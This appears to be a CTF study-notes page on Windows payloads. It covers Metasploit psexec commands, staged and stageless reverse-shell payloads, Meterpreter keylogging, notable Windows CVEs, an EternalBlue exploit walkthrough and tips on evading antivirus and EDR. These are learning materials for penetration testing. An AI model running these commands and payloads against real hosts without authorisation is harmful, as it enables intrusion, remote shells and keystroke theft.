> For the complete documentation index, see [llms.txt](https://capcap-1.gitbook.io/capcap/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://capcap-1.gitbook.io/capcap/readme/ctf-modules/vulnerability-assessment/shells-and-payloads/windows-payloads.md).

# Windows Payloads

Using msf:

```bash
msfconsole
search smb psexec                  # Find the module
use exploit/windows/smb/psexec     # Select it
options                            # View required settings
set RHOSTS <Victim_IP>             # Target IP
set SHARE ADMIN$                   # Target share (requires admin creds)
set SMBUser <username>
set SMBPass <password>
set LHOST <Your_IP>                # Your listener IP
set LPORT 4444                     # Your listener port
exploit                            # Fire
```

***

#### Windows Payloads

Staged (Notice the `/` separating the stages)

* `windows/x64/meterpreter/reverse_tcp`
* `windows/x64/meterpreter/reverse_http`
* `windows/x64/meterpreter/reverse_https`
* `windows/x64/shell/reverse_tcp`
* `windows/x64/encrypted_shell/reverse_tcp`

Stageless (Notice the `_` combining the shell and network communication)

* `windows/x64/encrypted_shell_reverse_tcp`
* `windows/x64/powershell_reverse_tcp`
* `windows/x64/powershell_reverse_tcp_ssl`
* `windows/x64/meterpreter_reverse_http`
* `windows/x64/meterpreter_reverse_https`
* `windows/x64/meterpreter_reverse_tcp`

> Note: If a firewall blocks direct connections, try `reverse_https` or `reverse_dns`.

#### What is Meterpreter?

Meterpreter is Metasploit's **advanced payload** — far more powerful than a basic reverse shell.

**How it works:** It injects itself entirely into **memory** (RAM) — it never touches the disk as a file. This makes it much harder for antivirus to detect.

**What you can do with it:**

| Command               | What it does                       |
| --------------------- | ---------------------------------- |
| `sysinfo`             | Get system info                    |
| `getuid`              | See who you're running as          |
| `upload` / `download` | Transfer files                     |
| `keyscan_start`       | Start keylogger                    |
| `ps`                  | List processes                     |
| `shell`               | Drop into actual Windows cmd shell |
| `?`                   | See all available commands         |

***

#### Dropping into a Full Windows Shell

Meterpreter has some limitations. To get full Windows command access:

bash

```bash
meterpreter > shell
```

```
Microsoft Windows [Version 10.0.18362.1256]
C:\WINDOWS\system32>
```

Microsoft's massive attack surface is driven by Active Directory, cloud interconnectivity, and legacy protocols. You need to be able to identify these common CVEs on sight.

| Vulnerability  | CVE / ID       | Attack Vector & Impact                                                                                                                  |
| -------------- | -------------- | --------------------------------------------------------------------------------------------------------------------------------------- |
| MS08-067       | MS08-067       | Critical SMB flaw allowing easy infiltration. Weaponized by Conficker and Stuxnet.                                                      |
| EternalBlue    | MS17-010       | SMBv1 remote code execution (RCE). Leaked by Shadow Brokers; utilized in WannaCry/NotPetya. Highly prevalent.                           |
| PrintNightmare | CVE-2021-34527 | Print Spooler RCE. Low-privilege users can install a malicious printer driver to gain SYSTEM access.                                    |
| BlueKeep       | CVE-2019-0708  | RDP vulnerability allowing RCE via a miscalled channel. Affects Windows 2000 to Server 2008 R2.                                         |
| Sigred         | CVE-2020-1350  | DNS flaw in reading SIG resource records. Successful exploitation on a Domain Controller yields Domain Admin privileges.                |
| SeriousSam     | CVE-2021-36934 | Mishandled permissions on `C:\Windows\system32\config`. Allows reading Volume Shadow Copies to dump the SAM database.                   |
| Zerologon      | CVE-2020-1472  | Cryptographic flaw in MS-NRPC (Netlogon). Allows rapid NT LAN Manager (NTLM) brute-forcing (\~256 guesses) to spoof domain controllers. |

#### 2. Host Enumeration & Fingerprinting

Before firing an exploit, you must confirm the OS and active services.

* Ping (ICMP TTL): A standard Windows host will typically return a Time To Live (TTL) of 128 (or slightly less, depending on network hops).
* Nmap OS Detection: Use `nmap -O -v <IP>` to check the TCP/IP stack against Nmap's database. (e.g., Output might show `OS CPE: cpe:/o:microsoft:windows_10`).
  * *Fallback:* If firewalls obscure results, run `nmap -A -Pn <IP>` to skip host discovery and run aggressive checks.
* Banner Grabbing: Use `nmap -v <IP> --script banner.nse` to pull service headers from open ports. This is critical for identifying specific software versions (like VMware auth daemons or IIS versions).

#### 3. Payload Types & Delivery

Your delivery mechanism dictates your payload type. Know the differences for staging your attacks.

* DLL (Dynamic Link Library): Modular shared code files. *Use case:* DLL hijacking to elevate privileges to SYSTEM or bypass UAC.
* Batch (.bat): Text-based DOS scripts. *Use case:* Simple, automated command-line execution (e.g., opening a port, sending basic enum data back).
* VBS (VBScript): Legacy scripting based on Visual Basic. *Use case:* Phishing attacks, malicious Excel Macros, client-side execution.
* MSI (.msi): Windows Installer databases. *Use case:* Crafting a malicious installer that runs via `msiexec` to grant an elevated reverse shell.
* PowerShell (.ps1): Modern, dynamic .NET-based shell environment. *Use case:* Advanced post-exploitation, dropping complex implants, parsing .NET objects.

Key Transfer Tools:

* Impacket: Python toolset for direct protocol interaction (psexec, smbclient, WMI).
* SMB File Shares: Leverage `C$` or `ADMIN$` to host, transfer payloads, and exfiltrate data.

#### 4. The Exploit Chain Walkthrough (EternalBlue / MS17-010)

This is the standard methodology for attacking a vulnerable Windows server using the Metasploit Framework:

1. Enumerate: `nmap -v -A <IP>` reveals OS version and open SMB ports (445/139).
2. Validate Vulnerability: Use MSF auxiliary scanner (`auxiliary/scanner/smb/smb_ms17_010`) to confirm the target is susceptible.
3. Configure Exploit: Select the exploit (e.g., `exploit/windows/smb/ms17_010_psexec`).
4. Set Payload: Define your listener (`windows/meterpreter/reverse_tcp`), configure `LHOST`, `LPORT`, and `RHOSTS`.
5. Execute: Run the exploit to capture a `SYSTEM` level Meterpreter session.

#### 5. Post-Exploitation Shells: CMD vs. PowerShell

Knowing which shell to spawn during an exam or engagement dictates your OPSEC and capability.

Use CMD (`C:\Windows\system32>`) when:

* You are attacking legacy targets (Windows XP/Vista) where PowerShell doesn't exist.
* You need to be stealthy: CMD does not keep a persistent command history record like PowerShell does.
* You only need to run native MS-DOS tools, `net` commands, or simple batch files.
* Strict Execution Policies or UAC are blocking PowerShell scripts.

Use PowerShell (`PS C:\Windows\system32>`) when:

* You need to run advanced custom scripts, modules, or cmdlets.
* You are interacting with cloud environments or Active Directory structures.
* You need to manipulate complex .NET objects rather than parsing flat text.
* OPSEC (stealth) is a lower priority than capability.

#### 6. Emerging Vectors: WSL & PowerShell Core

* WSL (Windows Subsystem for Linux): Attackers are utilizing Linux binaries and Python3 inside WSL to bypass Windows Defender and standard EDR mechanisms. Traffic to/from WSL is currently a blind spot for the Windows Firewall.
* PowerShell Core: Runs on Linux and carries over native functions. Highly stealthy because defenses are currently ill-equipped to monitor cross-platform OS abuse natively.


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://capcap-1.gitbook.io/capcap/readme/ctf-modules/vulnerability-assessment/shells-and-payloads/windows-payloads.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
